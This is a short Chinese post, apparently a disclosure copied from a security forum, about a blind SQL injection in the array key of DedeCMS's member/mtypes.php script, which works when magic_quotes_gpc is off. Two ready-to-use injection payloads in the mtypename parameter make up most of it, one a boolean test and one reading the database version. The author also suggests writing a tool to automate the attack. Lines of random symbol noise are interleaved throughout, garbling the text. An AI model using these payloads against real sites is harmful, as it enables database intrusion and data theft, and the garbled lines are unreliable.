需要magic_quotes_gpc = Off,所以说是鸡肋啊.
6 q2 }" [" g8 a8 k4 `8 u" j# N: M
3 _2 }1 P. j5 D" U' M ! o9 l. U3 a; H. k: h* n& w% D
发生在数组key里的注射漏洞,有点意思.
- g' ~6 _' \: w! V " F( ^% N, z* O0 V
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
5 C- [* q# i8 _3 s* j( q/ ?" p # q6 j: `, x! y# V8 a1 Y
http://www.xxx.com /dede/member/mtypes.php?dopost=save4 w, x& f4 u* o* G! U! h& T
5 u/ l& [9 P+ x3 A6 U) Texploit:2 x7 o# D) Q! X( x
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
: R+ N8 A6 E$ E) [: U Z( qmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
: Z) t$ }' k1 v$ } |